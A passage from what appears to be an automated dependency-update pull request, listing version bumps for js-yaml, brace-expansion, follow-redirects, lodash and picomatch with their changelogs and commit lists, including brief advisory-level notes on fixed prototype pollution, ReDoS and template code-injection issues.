href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.14\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/10c05fcf3699b1a29ef5e611c011af3d3c97e6e3\"\u003e\u003ccode\u003e10c05fc\u003c/code\u003e\u003c/a\u003e 1.1.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/1afa1b22ead12f6a7a02f25bf0f7d64c2439b007\"\u003e\u003ccode\u003e1afa1b2\u003c/code\u003e\u003c/a\u003e Add opt-in { max } mitigation to v1 legacy line (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/2fbb6a2aa0f984bb2fb5f60252ca6cba3e1368ec\"\u003e\u003ccode\u003e2fbb6a2\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u0026quot; (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/102\"\u003e#102\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/0d7652e3093d3273151729812f9b0b79a17ecba6\"\u003e\u003ccode\u003e0d7652e\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/6c353caf23beb9644f858eb3fe38d43a68b82898\"\u003e\u003ccode\u003e6c353ca\u003c/code\u003e\u003c/a\u003e 1.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2\"\u003e\u003ccode\u003e7fd684f\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-f886-m6hf-6m8v (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 2.0.1 to 2.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/10c05fcf3699b1a29ef5e611c011af3d3c97e6e3\"\u003e\u003ccode\u003e10c05fc\u003c/code\u003e\u003c/a\u003e 1.1.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/1afa1b22ead12f6a7a02f25bf0f7d64c2439b007\"\u003e\u003ccode\u003e1afa1b2\u003c/code\u003e\u003c/a\u003e Add opt-in { max } mitigation to v1 legacy line (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/2fbb6a2aa0f984bb2fb5f60252ca6cba3e1368ec\"\u003e\u003ccode\u003e2fbb6a2\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u0026quot; (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/102\"\u003e#102\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/0d7652e3093d3273151729812f9b0b79a17ecba6\"\u003e\u003ccode\u003e0d7652e\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/6c353caf23beb9644f858eb3fe38d43a68b82898\"\u003e\u003ccode\u003e6c353ca\u003c/code\u003e\u003c/a\u003e 1.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2\"\u003e\u003ccode\u003e7fd684f\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-f886-m6hf-6m8v (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.11 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/0c23a223067201c368035e82954c11eb2578a33b\"\u003e\u003ccode\u003e0c23a22\u003c/code\u003e\u003c/a\u003e Release version 1.16.0 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9\"\u003e\u003ccode\u003e844c4d3\u003c/code\u003e\u003c/a\u003e Add sensitiveHeaders option.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5e8b8d024e2c76f804a284258e585ecb49a575be\"\u003e\u003ccode\u003e5e8b8d0\u003c/code\u003e\u003c/a\u003e ci: add Node.js 24.x to the CI matrix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7953e2255aa0b93602eed3804f3bc5e6923a03af\"\u003e\u003ccode\u003e7953e22\u003c/code\u003e\u003c/a\u003e ci: upgrade GitHub Actions to use setup-node@v6 and checkout@v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/86dc1f86e4b56bcd642c78384d51f10f123aea75\"\u003e\u003ccode\u003e86dc1f8\u003c/code\u003e\u003c/a\u003e Sanitizing input.\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.11...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `lodash` from 4.17.23 to 4.18.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lodash/lodash/releases\"\u003elodash's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.18.1\u003c/h2\u003e\n\u003ch2\u003eBugs\u003c/h2\u003e\n\u003cp\u003eFixes a \u003ccode\u003eReferenceError\u003c/code\u003e issue in \u003ccode\u003elodash\u003c/code\u003e \u003ccode\u003elodash-es\u003c/code\u003e \u003ccode\u003elodash-amd\u003c/code\u003e and \u003ccode\u003elodash.template\u003c/code\u003e when using the \u003ccode\u003etemplate\u003c/code\u003e and \u003ccode\u003efromPairs\u003c/code\u003e functions from the modular builds. See \u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6167#issuecomment-4165269769\"\u003elodash/lodash#6167\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThese defects were related to how lodash distributions are built from the main branch using \u003ca href=\"https://github.com/lodash-archive/lodash-cli\"\u003ehttps://github.com/lodash-archive/lodash-cli\u003c/a\u003e. When internal dependencies change inside lodash functions, equivalent updates need to be made to a mapping in the lodash-cli. (hey, it was ahead of its time once upon a time!). We know this, but we missed it in the last release. It's the kind of thing that passes in CI, but fails bc the build is not the same thing you tested.\u003c/p\u003e\n\u003cp\u003eThere is no diff on main for this, but you can see the diffs for each of the npm packages on their respective branches:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elodash\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-es\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-amd\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash.template\u003c/code\u003e\u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.18.0\u003c/h2\u003e\n\u003ch2\u003ev4.18.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.0\"\u003ehttps://github.com/lodash/lodash/compare/4.17.23...4.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.unset\u003c/code\u003e / \u003ccode\u003e_.omit\u003c/code\u003e\u003c/strong\u003e: Fixed prototype pollution via \u003ccode\u003econstructor\u003c/code\u003e/\u003ccode\u003eprototype\u003c/code\u003e path traversal (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh\"\u003eGHSA-f23m-r3pf-42rh\u003c/a\u003e, \u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003efe8d32e\u003c/a\u003e). Previously, array-wrapped path segments and primitive roots could bypass the existing guards, allowing deletion of properties from built-in prototypes. Now \u003ccode\u003econstructor\u003c/code\u003e and \u003ccode\u003eprototype\u003c/code\u003e are blocked unconditionally as non-terminal path keys, matching \u003ccode\u003ebaseSet\u003c/code\u003e. Calls that previously returned \u003ccode\u003etrue\u003c/code\u003e and deleted the property now return \u003ccode\u003efalse\u003c/code\u003e and leave the target untouched.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.template\u003c/code\u003e\u003c/strong\u003e: Fixed code injection via \u003ccode\u003eimports\u003c/code\u003e keys (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc\"\u003eGHSA-r5fr-rjxr-66jc\u003c/a\u003e, CVE-2026-4800, \u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e879aaa9\u003c/a\u003e). Fixes an incomplete patch for CVE-2021-23337. The \u003ccode\u003evariable\u003c/code\u003e option was validated against \u003ccode\u003ereForbiddenIdentifierChars\u003c/code\u003e but \u003ccode\u003eimportsKeys\u003c/code\u003e was left unguarded, allowing code injection via the same \u003ccode\u003eFunction()\u003c/code\u003e constructor sink. \u003ccode\u003eimports\u003c/code\u003e keys containing forbidden identifier characters now throw \u003ccode\u003e\u0026quot;Invalid imports option passed into _.template\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd security notice for \u003ccode\u003e_.template\u003c/code\u003e in threat model and API docs (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6099\"\u003e#6099\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDocument \u003ccode\u003elower \u0026gt; upper\u003c/code\u003e behavior in \u003ccode\u003e_.random\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6115\"\u003e#6115\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix quotes in \u003ccode\u003e_.compact\u003c/code\u003e jsdoc (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6090\"\u003e#6090\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003elodash.*\u003c/code\u003e modular packages\u003c/h3\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6157\"\u003eDiff\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe have also regenerated and published a select number of the \u003ccode\u003elodash.*\u003c/code\u003e modular packages.\u003c/p\u003e\n\u003cp\u003eThese modular packages had fallen out of sync significantly from the minor/patch updates to lodash. Specifically, we have brought the following packages up to parity w/ the latest lodash release because they have had CVEs on them in the past:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.orderby\"\u003elodash.orderby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.tonumber\"\u003elodash.tonumber\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trim\"\u003elodash.trim\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trimend\"\u003elodash.trimend\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.sortedindexby\"\u003elodash.sortedindexby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.zipobjectdeep\"\u003elodash.zipobjectdeep\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.unset\"\u003elodash.unset\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.omit\"\u003elodash.omit\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.template\"\u003elodash.template\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/cb0b9b9212521c08e3eafe7c8cb0af1b42b6649e\"\u003e\u003ccode\u003ecb0b9b9\u003c/code\u003e\u003c/a\u003e release(patch): bump main to 4.18.1 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6177\"\u003e#6177\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/75535f57883b7225adb96de1cfc1cd4169cfcb51\"\u003e\u003ccode\u003e75535f5\u003c/code\u003e\u003c/a\u003e chore: prune stale advisory refs (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6170\"\u003e#6170\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/62e91bc6a39c98d85b9ada8c44d40593deaf82a4\"\u003e\u003ccode\u003e62e91bc\u003c/code\u003e\u003c/a\u003e docs: remove n_ Node.js \u0026lt; 6 REPL note from README (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6165\"\u003e#6165\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/59be2de61f8aa9461c7856533b51d31b7d8babc4\"\u003e\u003ccode\u003e59be2de\u003c/code\u003e\u003c/a\u003e release(minor): bump to 4.18.0 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6161\"\u003e#6161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/af634573030f979194871da7c68f79420992f53d\"\u003e\u003ccode\u003eaf63457\u003c/code\u003e\u003c/a\u003e fix: broken tests for _.template 879aaa9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/1073a7693e1727e0cf3641e5f71f75ddcf8de7c0\"\u003e\u003ccode\u003e1073a76\u003c/code\u003e\u003c/a\u003e fix: linting issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e\u003ccode\u003e879aaa9\u003c/code\u003e\u003c/a\u003e fix: validate imports keys in _.template\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003e\u003ccode\u003efe8d32e\u003c/code\u003e\u003c/a\u003e fix: block prototype pollution in baseUnset via constructor/prototype traversal\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/18ba0a32f42fd02117f096b032f89c984173462d\"\u003e\u003ccode\u003e18ba0a3\u003c/code\u003e\u003c/a\u003e refactor(fromPairs): use baseAssignValue for consistent assignment (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6153\"\u003e#6153\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/b8190803d48d60b8c80ad45d39125f32fa618cb2\"\u003e\u003ccode\u003eb819080\u003c/code\u003e\u003c/a\u003e ci: add dist sync validation workflow (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6137\"\u003e#6137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `picomatch` from 4.0.2 to 4.0.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/releases\"\u003epicomatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.0.4\u003c/h2\u003e\n\u003cp\u003eThis is a security release fixing several security relevant issues.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca 